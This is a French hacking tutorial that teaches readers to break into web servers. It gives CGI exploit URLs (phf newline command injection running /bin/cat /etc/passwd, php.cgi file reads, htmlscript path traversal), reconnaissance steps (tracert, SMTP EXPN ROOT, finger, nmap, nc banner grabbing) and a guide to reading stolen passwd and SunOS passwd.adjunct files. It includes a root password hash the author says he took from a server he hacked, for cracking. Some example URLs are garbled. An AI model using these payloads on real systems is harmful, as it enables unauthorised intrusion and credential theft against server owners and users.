Le titre ne vous dira peut-être rien, d'ailleurs, j'aurais pas écris l'article je n'en aurais pas la moindre idée non plus. ;-) On va prendre un exemple pour expliquer le titre alors. Vous avez sûrement remarqué quand vous allez dans un site un "cgi-bin" au niveau de l'url. Il y en a très souvent dans les moteurs de recherche. Alta Vista en est d'ailleurs un très bon exemple. Vous allez sur alta vista et vous tapez hacking et choisissez la langue française, lancez la recherche. L'url de la page deviendra la suivante: "http://www.altavista.com/cgi-bin/query?pg=q&kl=fr&q=hacking&search=Search"

Vous l'avez vu le cgi? Bah voilà, c'est ça. En gros c'est un programme écrit en pearl ou en c (ou en d'autres langages mais je n'ai entendu parler que de ceux en pearl et en c) qui permet des accès à l'intérieur du serveur par mot clé. Certaines séries de lettres représentent des touches tapées comme "Enter" par exemple. Ce qui fait qu'en mettant une adresse on exécute un programme, qui, s'il est buggé (plutôt si nous connaissons le bug ;-), car bug il y a toujours), agira en fait comme un outil de recherche genre "explorateur windows". Un cgi peut vraiment faire beaucoup de choses: recherche de fichiers, compteur de visites, animations, ... Et son utilisation dans les sites est très répandu vu qu'il a à peu près le même potentiel qu'un script Java. Sacré potentiel n'est ce pas?

Ci-dessous différentes manières d'exploiter ces bugs pour devenir root ou pour faire d'autres truc sympa juste avec Netscape. Même pas besoin de Linux, c'est pas fort ça? Juste d'un petit crack jack, enfin, je vous refais pas un cours.

Pfs:
Des filtres pas très au point sur certaines requêtes permettent d'accéder au fichier contenant le password root sur les serveur tournant sous NCSA (version inférieure ou égale à 1.5 ) et sous apache (versions inférieures à 1.0.5):

http://url_du_site/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/phf?Qalias=x%0a/bin%20/etc/passwd

Pfs(un autre bug):
Idem mais là, la commande change vraiment très peu et ça ne marche pas que sur ceux énumérés au dessus:

http://url_du_site/cgi-bin/phf?Qname=x%0a/bin/cat%20/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/phf?Qname=x%0a/bin%20/etc/passwd

Php:
Même chose que ci-dessus sauf que c'est avec php. La syntaxe n'est pas la même mais le résultat est identique, on a le pass root:

http://url_du site/cgi-bin/php.cgi?/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/php.cgi?/etc/passwd

Php(un autre bug):
Idem mais là, la commande change vraiment très peu:

http://url_du site/cgi-bin/php?/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/php?/etc/passwd

Query:
Là c'est encore la même chose mais ça marche avec query:

http://url_du site/cgi-bin/query?%0a/bin/cat%20/etc/passwd
Exemple: http://www.assassin.com/cgi-bin/query?%0a/bin/cat%20/etc/passwd

Htmlscript:
Là aussi ça sert à devenir root en trouvant le pass root, le tout est de savoir où se trouve le répertoire /etc par rapport au cgi-bin. Si vous connaissez un peu l'arborescence des répertoires sous UNIX vous ne devriez pas avoir trop de problème à vous repérer, surtout que vous n'êtes pas obligé de mettre /etc/passwd mais par exemple: /usr/rhylkim, sous peine bien sûr que le fichier rhylkim et le répertoire /usr éxistent.

http://url_du_site/cgi-bin/htmlscript?../../etc/passwd
Exemple: http://www.assassin.com/cgi-bin/htmlscript?../../../etc/passwd

Dans cet exemple il sagissait de redescendre à la racine là où se trouve le répertoire /etc et pour cela on est descendu de trois niveaux vu que dans cet exemple, le cgi-bin se trouvait dans le répertoire: /web/info/revelation. Mais ce n'est qu'un exemple. Le cgi-bin pourrait très bien se trouver dans le répertoire: /bin/rhylkim et on aurait été obligé de faire: http://www.assassin.com/cgi-bin/htmlscript?../../etc/passwd.

Dans quel cas les cgi phf et autrs scripts ne servent à rien? Si le serveur a ses pages web transistant par le port 8000, 8001 ou 8080 ca ne sert à rien d'essayer car même si les bug des cgi sont présents, vous ne pourrez pas acceder au répertoire contenant le fichier passwd. En effet le http passe le plus courement par le port 80 mais le port 8080 est aussi très souvent utilisé notamment pour ce qui concerne les proxy. Les ports 8000 et 8001 sont assez peu utilisé mais que cela ne vous etonne pas si vous eombez dessus. Vous pouvez recupérer le passwd avec les cgi si le http passe par le port 80 car c'est un port privilégié et les 8080, 8000 et 8001 ne le sont pas. Un port privilégié signigie que seul le root ou une personne loguée en tant que root (su) peut l'utiliser ou utiliser des programmes faisant transiter des paquets par celui ci. Pour savoir si un serveur a son http sur le port 80 ou autres c'est assez simple, mettez ":n°_du_port" apres son DNS.

Exemple: si le serveur a son http à l'adresse http://www.assassin.com/, faites http://www.assassin.com:80/ et si la page reste la même il est sur le port 80. Bien sur si vous obtenez une page vide avec des mots comme "not found" genre ce que l'on trouve en faisant http://www.fbi.gov:8080/ ou une page non attribuée (faites le même serveur mais avec le port 8000) c'est que le http ne se trouve pas sur le port que vous avez demandé.

Bien sûr je n'ai pas tout à fait raison quand je vous dis que les scripts cgi ne servent à rien si le http n'est pas lancé en root. Cela pourra toujours vous donner un acces user sur la bécane si le bug est présent. Et on ne devient pas toujours root tout de suite (et même loin de là) et l'acces user est toujours plus important qu'un acces en anonymous surtout que si l'account de cet user a servi au http il a peut être servi à autre chose. Mais il se peut aussi que cet account soit stérile car l'admin a très bien pu utiliser un port différent du 80 par mesure de sécutité et donc a prévu le fait que l'account sous lequel il a lancé le http soit hacké par la suite.

Voilà, c'est tout, j'en ai encore une petite dizaine mais ce sera pour un autre jour car ce sont essentiellement des scripts. Pour tous les exemples précédents, il sagissait de serveurs n'ayant pas de pass shadows. Si vous voulez exploiter ces bugs avec une machine ayant des pass shadows (la plupart d'ailleurs) il faudra pour cela remplacer /etc/passwd par le répertoire et le fichier pass correspondant suivant le type de serveur attaqué. Pour connaître les correspondances suivant l'OS du serveur, allez à l'article: Passwords shadows.
 

Cerner une cible :

Pour combattre un ennemi il faut le connaître. C'est pareil pour un hack, il va falloir obtenir un certain nombre de renseignements (le plus possible d'ailleurs) sur la machine que l'ont veut hacker, on va l'appeler la machine "cible". Pour celà on dispose de pas mal d'outils. Tous ne s'appliqueront pas à toutes les machines car leur niveau de sécurité diffère et certains se révéleront inefficaces. J'ai parlé de pas mal de ces outils dans différents articles de ce site donc je ne reparlerais pas de ceux la, je les citerais juste et ferais un lien vers l'article correspondant. Mais ne vous inquiétez pas je donnerais suffisamment d'infos pour que vous compreniez et que vous puissiez commencer à expérimenter un peu.

Là on ne parle pas de hack foireux à la BO (Back Orifice) ou avec quelques autres taupes et troyens. Là c'est du hack de serveurs qu'il sagit et plus du pc de grand mère sous win9X. Les risques commencent véritablement pour vous ici mais comme j'imagine que vous en êtes conscience, on va commencer.

Dans cet article je ne donne pas d'adresse précise de serveur comme j'ai fais pour le hack par ftp car ça redonnerait encore lieu à des abus. Donc le serveur sera celui de la boite "assassin" et son adresse DNS (domain name service) sera http://www.assassin.com/. Toutes les manip que j'expliquerais dans cet article seront réalisées sous windows mais se font très bien (j'ai entendu mieux dans la salle?) sous linux seulement les commandes diffèrent et je ne les expliquerais pas ici. Je vais revenir rapidement sur les différences entre les adresses ip, DNS et URL. Tous les serveurs ont une adresse ip (et ouais car la définition d'un serveur c'est un ordinateur connecté à un réseau et à d'autres ordinateurs qui peuvent consulter celui la) sauf quand ils ne sont pas connectés. Pour la définition précise d'une adresse ip je vous reporte à l'article que j'ai écrit dessus. Une adresse DNS est une adresse du type: http: ... . J'écrit pas www car ça dépend des adresses DNS il y en a qui n'ont pas DNS mais qui commencent par autre chose genre http://perso.infonie.fr ou par ww2 ou www3 ... C'est vrai que c'est plus facile à retenir www.assassin.com que 167.34.217.65. Pour obtenir une adresse DNS, la société à qui appartient le serveur doit débourser une somme comprise entre 500 et 1000 Frs à un organisme chargé d'attribuer ces adresses et qui fait gaffe à ce que deux serveurs différents n'en utilisent pas deux identiques. Enfin une adresse URL c'est les deux choses citées au dessus. On parle d'adresse URL en pour spécifier à quelqu'un que c'est bien de l'adresse d'un serveur par le port 80 (port utilisé pour le www, les pages web quoi) dont on parle et non d'une adresse E mail. Alors quand on demande l'url d'un site généralement on vous donne l'adresse DNS mais on pourrait très bien vous donner son ip ca ne changerait rien pour vous. Car bien sur si vous tapez l'ip d'un serveur dans netscape ou son adresse DNS vous arriverez aux mêmes pages. Sous réserve bien sûr que ce serveur ait bien un site web.

Maintenant que ceci est éclairci on va en revenir au coeur de notre affaire. Avec une adresse DNS on ne peut pas faire grand chose, il va nous falloir l'adresse ip du serveur et pour ça on va faire un ping. Pour celà on tape sous dos:
ping -a www.assassin.com      et ça va vous donner son ip :-) ainsi que la qualité de la connection et la rapidité de la liaison mais ça on s'en fout un peu il faut dire.

Maintenant on va voir combien il y a de machines entre nous et le serveur assassin. Pour celà plusieurs méthodes. Ou vous utilisez un prog genre visual route (payant aux dernières nouvelles) ou neotrace ou d'autres encore ou alors on utilise une commande dos qui s'appelle tracert. Les progs je n'explique pas comment ils marchent, c'est super simple et ils ont l'avantage d'être graphique mais pour ceux qui préfèrent les lignes de texte, c'est l'option dos qu'il vous faut. D'ailleurs je l'explique rapidement et même si vous êtes un fan des programmes j'imagine que vous n'avez rien contre un peu de culture générale:
Donc sous dos vous allez taper:                tracert url_du_serveur
exemple:  tracert 167.34.217.65 ou tracert www.assassin.com (les deux marchent)
Si il y a marqué "host unreachable" c'est que vous avez mal recopié l'ip trouvée précédemment ou l'url ou que le serveur n'est plus connecté.
Toutes les machines se trouvant entre vous et le serveur ciblé se marqueront avec leur ip. Notez ça dans un coin ou faites une capture d'écran (Impr écran). La dernière ip marquée sera celle de la cible. Et si celle juste avant celle de la cible a les trois mêmes numéros que celle de votre cible c'est que la cible à laquelle vous tentez de vous attaquer est plus que probablement secure. Ca va être drôle. En langage de néophyte c'est qu'il y a une machine disposé sur le LAN (Un LAN est la ligne entre le réseau interne et le réseau externe) entre la machine cible et Internet et qui assure sa protection. C'est a dire que l'administrateur system a investi dans une machine (il peut y en avoir même plusieurs) qui ne sert qu'à la sécurité et a rien d'autre. C'est soit un firewall soit un routeur filtrant soit un bastion soit un bunker soit un garde-barrière soit une proxy ou je ne sais quelle autre saloperie de ce genre :-). Si une telle machine placée sur le LAN n'existe pas quand vous avez fait le tracert ce n'est pas pour cela qu'une protection du même type n'est pas incluse dans le serveur assassin lui même (c'est presque toujours le cas d'ailleurs) mais généralement c'est un indice assez fiable du niveau de sécurité d'un réseau.

Si vous avez lu l'article sur les ip vous savez que les trois premiers nombre d'une ip correspondent à un domaine et que le dernier nombre correspond a une machine de ce réseau. Dans cet exemple le domain est 167.34.217 puisque l'ip du serveur assassin est 167.34.217.65 et la machine est sur le "poste" 65. Dans la très grande majorité des cas (que dis je, la totalité) il y a plusieurs machines dans un même domaine et elle doit avoir un numéro de "poste" situé entre 0 et 255. Bien sûr il y a des domaines qui ont plus de 256 serveurs reliés entre eux et dans ce cas ils ont soit plusieurs domaines reliés à internet (c'est le cas d'aol qui en a des centaines qui commencent par 162, 171, 172,...) soit ont des sous réseaux à l'intérieur des domaines qui ne sont pas reliés directement à internet et qui utilisent des ip peut être déjà utilisées pas d'autre serveurs sur internet mais comme elles n'ont pas de connection directe à internet aucun problème ne se pose. Et si elles veulent se connecter quand même à internet elle s'y connectent à travers un proxy et prennent donc l'ip de ce proxy pour obtenir les réponses provenant de l'internet ou du réseau externe. Un proxy est un type de firewall qui transmet des requêtes entre un réseau interne et un réseau externe mais ne donne pas de contact direct entre deux machines (bah ouais sécurité oblige) et s'il y avait contact directe, la machine du sous réseau créerait un conflit d'ip car elle récupérait son ip de départ. Compliqué tout ça? Ce sera expliqué en détail dans l'article sur les firewalls. Ca vous rappelle pas quelque chose le fait de passer par un proxy qui fait changer l'ip? Et oui le spoofing! Arf la vie est belle quand même mais là c'est pas nous qui l'utilisons. Donc chassez ça de votre pensée sinon vous allez vous embrouiller pour la suite. Pour l'instant votre ip n'est pas spooffé mais ça viendra. :-)
 

Donc je disais que le serveur assassin devait être relié à d'autre machines de son sous réseau et ben pour le savoir on a plusieurs méthodes:
     - La première c'est de prendre un programme qui s'appelle un scanner d'ip et de rentrer dedans l'ip du serveur assassin. Ca cherchera tous les serveurs ayant des ip contenus entre 167.34.217.0 et 167.34.217.255 puisque l'ip de la cible est 167.34.217.65. Le programme vous sortira plein (espérons) d'ip que vous noterez consciencieusement.
     - La deuxième est d'utiliser une mine d'informations existant sur une grande partie des serveurs du monde reliés à internet et disponible à tous. Tous les serveurs ayant une adresse DNS (et les autres aussi peut être. Là je sais pas) doivent recenser un certain nombre d'infos comme le nombre de machines ayant accès à leur serveur, la taille (en nombre d'ip ou de machine) de leur domaine... Cette mine d'info est disponible par telnet ce qui veut dire qu'il va falloir lancer telnet. Il existe plusieurs serveurs qui fournissent ce genre d'infos et notamment Internic (whois.internic.net) et Netcraft (www.netcraft.com) mais on y reviendra en détail dans un autre article car les possibilités de cette recherche sont assez allucinantes. Sachez pour l'instant juste que ça existe.
     - La troisième est de faire un expn sur un snmp d'une des bécanes du réseau. Et si celà vous renvoit une adresse mail sur un serveur différent mais d'un même domaine vous serez fixé. Je rappelle que le smtp c'est le port 25. Vous vous y connectez par win ou par linux et vous tapez :HELO nom du serveur (comme vu pour le remailer anonyme) puis une fois que celui ci vous aura salué à son tour vous ferez EXPN ROOT. Bien sûr il faut que le login ROOT existe car bien sûr le root n'a pas toujours le login root et même loin de là. Il se peut même que le login root n'est qu'un statut d'user. Essayez donc toujours EXPN ROOT et voyez ce que celà donne si ca met "login inconnu" essayez les autres login bâteau utilisés par les root tels que sysop, admin,... et puis si ça ne donne rien et que le serveur que vous attaquez a une page web vous pourrez essayer de chercher des infos sur les différents email sur ce site. Bien sûr le expn ne marche pas que pour le root mais pour n'importe quel user.
     - La quatrième est de faire un nslookup sur un serveur mais cela ne marche que sous Linux. pour cela faites:  nslookup www.assassin.com (en mode console bien sûr)
     - Le cinquième est de faire un dig. Toujours en mode console sous Linux: dig www.assassin.com.
     - Le dernier moyen c'est d'utiliser certains ports spécifiques comme le finger (79) et le whois (43), qui, quand il ne sont pas fermés ou inutilisables par une machine étrangère sont très instructifs pour savoir quelles sont les machines et les users connectés à cette machine ainsi que leur ip et leurs droits. Pour savoir quels ports sont ouverts (comme le ftp, le telnet, le finger...) on utilise un scanner de ports. Bien sûr pour qu'un serveur puisse savoir quelles personnes sont autorisées à entrer, il a des critères qu'il vérifie comme le login, le pass, l'ip, les ports sources, le protocole des paquets,... Avec les infos que l'on vient de récolter on va pouvoir utiliser des méthodes pour falsifier ces critères et contourner les sécurités. Mais ça c'est pour un autre article...
 

Maintenant on va essayer de voir sur quel OS tourne un serveur. Ca nous servira énormement pour savoir quel méthode de hack utiliser. Pour celà il y a aussi plusieur méthodes malheureusement la plupart de celle que je connais passent par linux. On ira pas jusqu'à dire Linux ou mourrir mais si on est pas un expert Windows (un véritable expert), il y a plein de choses que vous ne pourrez pas exploiter sans programme spécifique et les programme (je parle ici de programme de hackers genre Satan, nmap,...) sous windows se font très rares. On est d'ailleurs obligé de faire soit même la conversion linux win ou programmer soi même sa propre application pour que win commence à ressembler à quelque chose d'exploitable. Les moyens de trouver sur quel OS tourne un serveur sont nombreux. Voici plusieurs méthodes:
- La première c'est le ftp. On va faire comme pour le hack par ftp et des la connection on va voir apparaître une ligne que le serveur nous enverra avec le type d'OS qu'il utilise. Ceci n'est pas une science exacte car pas mal de serveur enlèvent cette ligne ou la remplace par une fausse ou par une bande de pub (secure ou commercial :-( ). Alors si vous êtes sous windows ca s'arrête là mais si vous êtes sous linux, il vous suffit de faire SYST pour avoir un complément d'informations sur l'OS du serveur.
- la deuxième se passe sous linux, il sagit de faire:

playground~ telnet hpux.u-aizu.ac.jp
Trying 163.143.103.12...
Connected to hpux.u-aizu.ac.jp.
escape character is '^]'.
HP-UX hpux B.10.01 A 9000/715 (ttyp2)
login:
(tiré du mag américain Phrack)
La vous voyez bien la version de l'OS du serveur (5ème ligne pour ceux qui n'auraient pas vu).

- La troisième méthode se passe également sous linux:

playground echo 'GET / HTTP/1.0\n' | nc hotbot.com 80 | egrep '^Server:'
Server: Microsoft-IIS/4.0
playground
(toujours trié du même zine)

- Enfin la dernière et la meilleure passe encore par linux car il s'agit d'utiliser les paquets TCP renvoyés par un serveur pour savoir de quel serveur il sagit. En effet le plupars des serveurs ont des gestions de couches de paquets tcp propres et donc differentes entre chaque serveur ce qui fait qu'en connaissant bien toutes les versions de tous les OS mondiaux, et en integrant leur particularité pour les renvois de paquets de protocole tcp, udp et même des fois icmp, le programme pourra presque avec certitude dire quel est l'OS qui tourne sur un serveur. En effet en envoyant un paquet quel que soit le protocole (tcp ou udp. Icmp étant à part car il ne sert que pour les paquets erreur ou redirigés avec retour car entête incorrect) le serveur altere un peu l'entête du paquet tcp sans pour autant toucher aux données utilles pour les users normaux. Cette altération va être mémorisée et analysée. Chaque OS l'altérant différement, son type et sa version seront imédiatement détectés. Ce programme s'appelle nmap et est disponible à l'adresse suivante: http://www.insecure.org/nmap.

Quelque chose qui peut peut être aussi vous servir c'est de mettre un "=" derrière un cgi-bin si le serveur possède une faille ça vous donnera la version de l'OS, du kernel, des scripts ... mais bon généralement on a besoin de ce genre d'infos avant d'être logué sur la bécane et ces infos vous ne les optiendrez que si vous avez un accès en lecture via http par les cgi-bin. Par exemple si un serveur nommé assassion a des scripts cgi php buggés il vous suffira de faire ça: www.assassin.com/cgi-bin/php.cgi?/=.

Bien sûr toutes les étapes précédentes ne sont pas indispensables, c'est rare quand toutes ces étapes sont obligatoires mais quand on n'arrive pas à rentrer dans un serveur directement on essaye de rentrer par un moins sécurisé auquel il fait confiance et c'est à ça que sert de savoir avec lesquels il communique.

Pièges à éviter :
 
Structure d'un fichier passwd UNIX :

Un fichier passwd sous UNIX varie de taille selon les serveurs mais a toujours la même structure. Il comporte un nombre différent de lignes et chacune des lignes donne les informations sur un login. Si vous ne lisez pas ce fichier avec vi sous UNIX (Linux est un système UNIX) mais par exemple avec Netscape (par exemple si on y accède avec les bug cgi) vous verez un amas informe d'informations car à la fin de chaques lignes il n'y a pas de retour à la ligne mais un espace ce qui fait que plusieurs logins (des fois trois ou quatre) se retrouvent sur la même ligne et ce n'est même pas la peine de remplacer les espaces par des retours à la ligne cela ne pourrait se faire car des annotations dans certains fichiers passwd contiennent des espaces. Le mieux étant donc de le lire sous console UNIX (je rapelle que la console c'est la fenêtre équivalente du dos sous UNIX).

Bon maintenant prenons le cas d'un fichier passwd lu par vi (éditeur standart relou sous Linux :-) avec un login par ligne (normal si on le lit par vi est c'est bien mieux comme ca). Toutes les lignes seront sur le même model. En voici une:
 
 
root : 4frT_jf6/GoRc.9s : 0 : 0 : assassin : /root : /bin/bash
1
2
3
4
5
6
7
Tableau d'équivalence :
 
Login de l'user
password crypté
UID (User ID): nombre représentant l'user pour l'ordinateur
GID (Group ID):  nombre représentant le group auquel appartient l'user 
Commentaires. Cette case est bien souvent vide mais si elle ne l'est pas il y aura surement dedans le véritable nom de l'user 
Répertoire ou est envoyé l'user au moment ou il se logue.
Premiere commande executée automatiquement dès que l'user est logué. Ici il sagit de bash qui permet d'envoyer d'autres commandes après et pouvoir ainsi faire faire des choses à l'OS. Si le bash n'est pas lancé vous pouvez toujours le faire en tapant bash en mode console.
Bon vous savez tout ce qu'il faut savoir sur la structure d'un fichier passwd et si à la place d'un mot de passe vous avez une * ou un !! ou un # reportez vous à l'article sur les passwords shadows. Si vous voyez une ligne de commande avez un password crypté qui vous semble louche (ex: UrNsHOLE (you are an ass hole) n'est ce pas Sb :-) ) et bien il est fake (faux) donc pas la peine de lancer cracker Jack la dessus.

SunOs 4.1 Shadows :

Prenons l'exemple concret du fichier passwd d'un serveur que j'avais hacké il y a peu de temps avec une faille dans les cgi-bin. Je ne vais pas donner l'URL du serveur car je ne veux pas qu'il se reproduise les débordements qu'il y a eu avec le serveur de comédie. Mais voici le contenu de ce fichier:

Proot:##root:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
ingres:*:7:7::/usr/ingres:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
ftp:*:100:100:Anonymous FTP:/www/ftp:/bin/false
sync::1:1::/:/bin/sync
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
Upwdauthd:##AUpwdauthd:10:10:::/bin/false
AUyppasswdd:##AUyppasswdd:11:10:::/bin/false

Ca c'était le contenu du fichier passwd se trouvant dans /etc (donc /etc/passwd). Là je ne vais pas pouvoir vous expliquer tout vu que ce fichier est shadows. Ca vous le voyez aux * (je l'ai condulté par netscape) se trouvant juste derrière les logins. Tous les logins ne comportent pas d'étoile et selon la définition que j'avais donné des passwords shadows vous allez y voir une contradiction mais c'est parce que serveur tourne sous SunOS 4.1. Alors si vous vous reportez à l'article que j'ai écrit sur les passwords shadows vous allez voir que les password se trouvent dans /etc/security/passwd.adjunct. Par contre vous ne pourrez pas le lire comme ça car sous cette version de SunOS il faudra que vous spécifiez quelle ligne vous voulez lire et pour ça on va se reporter au /etc/passwd. On va chercher le pass du root tant qu'à faire. On voit que dans le /etc/passwd le login root est bien celui qui a le statut root (et oui un login peut s'appeler root sans en avoir les fonction. C'est comme si je m'appelais casimir je ne serais pas pour autant fan de globi boulgats) car il a le 0 dans la troisième colone. On voit que ce login est toujours activé car il y a quelque chose d'écrit dans la deuxième colone et que ce n'est pas un * ou un X. Il y a marqué ##root dans la deuxième colone donc c'est l'instruction que nous allons écrire dans notre browser ou sur notre console ( ça dépends de l'accès que vous avez au serveur) juste après l'arborescence qui mène au fichier password en les séparant d'un espace ce qui donnera pour l'exemple présent avec un SunOS 4.1: /etc/security/passwd.adjunct ##root. Si vous mettez ca dans votre browser ça ne donnera rien bien sur mais si je vous dis que le bug des cgi que j'ai utilisé c'est le php vous devriez (si vous avez lu toute la page et que vous l'ayez compris) reussir a trouver le même résultat que moi c'est à dire:
AUpwdauthd:*::::: root:Sc4kqf/wC8kac::::: AUyppasswdd:*::::: +::::::
 

En voyant comment était constitué ce fichier shadows vous voyez qu'il ne correspond pas du tout aux fichiers passwd habituels et vous aurez surement compris que quoi que l'on tape précédement à la place de ##root ça n'aurait rien changé car nous avons à présent l'état des comptes root, AUpwdauthd et AUyppasswdd (quand je dis "n'importe quoi à la place" c'est n'impore lequel des trois et non n'importe quel mot ou login mais ça j'espère que vous l'aurez compris). On voit que seul le login root n'a pas été désactivé et que son pass crypté est Sc4kqf/wC8kac donc plus qu'à faire tourner le cracker de brute ;-)
 

Linux :

Il est clair que vous avez déjà entendu parler de Linux que ce soit dans ce site, dans la presse ou sur internet dans des zines ou par le biais d'autres "hackers". On raconte beaucoup de conneries sur Linux et certaines personnes tellement fières d'avoir installer Linux en augmentent volontairement les capacités c'est ainsi que l'on entends par ci par là sur internet qu'un mec peut hacker tout le monde car il a Linux ou qu'il est tout simplement un boss car il a réussi a l'installer. La vérité est que beaucoup l'installent et en restent là visiblement dépassés par le nombres de commandes complexes et n'ayant rien à voir avec Windows.

Linux est un système UNIX pour pc et c'est d'ailleur le seul (enfin je ne parle pas des Minix et autres OS considérés comme defaints car dépassés ou oubliés) ce qui veut dire qu'il est multi utilisateur comme tout UNIX. Les UNIX dont il existe beaucoup de versions (SunOS, Ultrix, IRIX, AIX, openBSD, ConvexOS, freeBSD, HP/UX, SCO, OSF, Unicos,...) ne tournent que sur des stations. Les stations ce sont des ordinateurs dont l'architecture n'a rien a voir avec celle d'un pc et n'est donc pas compatible avec elle. Quand on parle du nec plus ultra pentium Xéon 500Mhz il faut savoir que les prossesseurs Alpha (équipant la majorité des stations) tournent facilement à 700 Mhz mais elles sont très chère et c'est pour cela que l'on ne les trouve qu'en entreprise ou presque. De plus la plupart des logiciels tournant dessus sont des suites bureautiques ce qui fait que l'utilisateur domestique d'un pc ne sera pas interressé par ces stations surtout que les logiciels UNIX sont très chers. Cependant voici Linux, compatible UNIX et tournant sur pc. Pour ce qui est des compatibilités avec Windows au niveau des application win c'est pas encore ça mais ça progresse et rien ne vous empèche d'avoir Windows et Linux sur le même pc et même pourquoi pas sur le même disque. J'expliquerais son installation dans le prochaine article.

Pourquoi Linux interresse-t-il les Hackers? Comme je viens de l'expliquer UNIX est est un système multiutilisateurs donc peut être installé en société et en réseau sans que personne n'interfère dans le travail d'un autre poste mais tout en permettant le partage des informations, si le système de sécurité (droits, FireWall,...) le permet bien sûr. De plus les stations sont plus rapides que les pc et permettent de faire tourner convenablement de très grosses application commes la DAO... C'est pour ça qu'il n'y a presque que des logiciels de travail sur UNIX. Maintenant les hackers veulent rentrer dans des résaeaux d'entreprises et celles ci sont equipées, pour les raisons que l'on vient de voir, de différentesversions d'UNIX. Et pour communiquer avec une machine tournant sur UNIX il faut un système compatible tel qu'un autre UNIX ou Linux ou encore le DOS. Avec Windows vous pourrez balbutier du kack mais vous n'atteindrez jamais les possibilités d'un Linux pour ce qui est de la compatibilité et donc des possibilités. Et ouais, essayez de monter NFS avec Windows je vous souhaite bien du courrage.

Alors avant Linux, UNIX existait déjà et c'était le bon vieux temps du hack sous dos mais Linux a beaucoup plus de possibilités que celui ci et a l'interêt d'être multiutilisateur. Donc ne cherchez pas, si vous voulez devenir Hacker et vous mettre au hack de sserveurs ce qui est quand même de loin le plus stimulant, installez Linux. "J'ai installé Linux, je suis maintenant un boss". Oula du calme faudrait pas trop s'emballer non plus. Comme je le disais plus haut il y en a qui se disent "je passe à Linux car c'est l'OS du hacker par excellence" mais qui sont soit rebuté par l'installation ou par les problèmes de compatibilité ou encore par la complexité (du moins apparente) des commandes et qui se décident de laisser tomber (provisoirement qu'ils disent, puis definitivement). T'as Linux? C'est là qu'il va falloir que tu commences à montrer ta détermination car il va fallor que tu te decide de remettre tous les compteurs à zéro. T'es une star de Windows mais tu connais pas trop le DOS? Il va falloir que tu accèptes de tout réapprendre sur un autre OS completement différent. Je sais on a l'impression de regresser mais tu va voir qu'après avoir compris les principales commandes de Linux on se sent à l'aise et on est conscient d'avoir franchi un grand pas. Je parlais de l'interêt de Linux pour les hackers a cause de sa compatibilité avec UNIX et bien c'est la seule chose à laquelle il vous servira pour le hack. C'est vrai que c'est beaucoup et quand vous commencerez à le maîtrier vous comprendrez mais si vous pensiez que parce qu'un hacker a Linux vous êtes à sa merci alors vous avez tout faux, surtout si vous avez Windows car Linux est utile pour sa compatibilité avec UNIX et non avec Windows (pour Windows NT c'est différent).

Je vais peut être vous paraître irrationnel ou stupide mais Windows 9X ( 95 et 98) est l'un des systèmes les plus secure si l'on sait s'en servir. En effet qu'est ce qui fait que les serveurs avec d'autres OS sont hackés? Premièrement parce que les donnés contenues dans les stations tournant sur ces OS interressent beaucoup de gens donc les hackers vont y rechercher des trous de sécurités. Ce qu'il ne se fatiguent pas à faire pour un système sans importance comme Windows 9X. Deuxièmement UNIX est paramètrable à tous les niveaux (win aussi) et les administarteurs systèmes sont obligés de les paramètrer sinon ça ne donne rien ce qui n'est pas le cas de windows qui est censé est monoutilisateur donc que l'on a pas besoin de paramètrer ce qui évite de faire des erreurs dans ce paramètrge qui permettrait de rentrer dans d'éventuels trous de sécurités ouverts par celles ci. Vous pouvez donc considérer que si vous n'avez pas de troyens ou de ressources partagées sur votre Windows vous ne risquez rien que le hacker en face ait Linux ou non.

Il y aurait encore beaucoup de choses à dire sur Linux, comme le fait que l'on puisse échanger des fichiers très facilement entre Linux et Windows et inversement ou encore qu'il reconnait actuellement la plupars des périfériques (sauf ceux explicités: "Uniquement Windows") ce qui était loin d'être le cas il y a encore 5 ans, mais j'imagine que c'est bon comme ça et que vous aurez compris sont très grand interêt mais que ce n'est pas le saint graal comme certains sembleraient le penser (cf: certains courriers que j'ai reçu).

Voilà, ceci étant établit vous allez pouvoir passer à l'installation de cet OS sans plus attendre.
 

Installation de Linux :

D'abord où se procurer Linux? C'est un logiciel gratuit ok et entierement téléchargeable sur internet mais vous vous épargnerez beaucoup de peines et de temps de connection et même peut être d'argent en l'achetant en magazin. Je m'explique: il est bien plus simple d'avoir un cd et une disquette de boot que l'on a si on a une version achetée en magazin plutot que beaucoup de fichiers sur un disque qui de plus peuvent être contaminés ou effacé par un virus ou toute autre saloperie du même genre. Et même si vous avec un graveur saurez vous quel fichier ou répertoire copier exactement? De plus vous serez obligé tôt ou tard d'acheter un bouquin sur Linux car les commandes sont complèxes et les possibilités étandues et même si vous vous êtes passé de manuel pour Windows (ça existe un manuel la dessus? Win pour les nuls peut-être arf ') vous ne pourrez vous en passer pour Linux et cela vous coutera en moyene 300frs pour un bouquin asssez complet (il contiendra sûrement une ou plusieurs versions de Linux en plus du bouquin). Donc vous avez compris, vous allez en magazin (FNAC par exemple quoi qu'il y ait des magazins moins chers, à vous de les trouver) et vous achetez un bouquin bien gros sur Linux (genre LINUX, Le Macmillan édition 1999. Je fais de la pub mais il est bien mais il y en a bien sûr d'autres tout aussi bien) qui contiendra plusieurs versions de linux (RedHat 5.2, OpenLiux 1.2 et StarOffice 4.0 SP3 pour le Macmillan). N'achetez pas de boîtes Linux d'une version de tel ou tel constructeur de Lunix car vous n'aurez qu'un cd et un minuscule manuel pour 300frs ce qui fait que comme vous serez obligé après d'acheter un bouquin plus complet vous allez vous retrouver avec un manuel qui ne sert à rien, des cd en double et un coût deux fois plus élevé que ce qu'il aurait pu être.

"Installation de Linux compliquée", Mythe ou réalité?
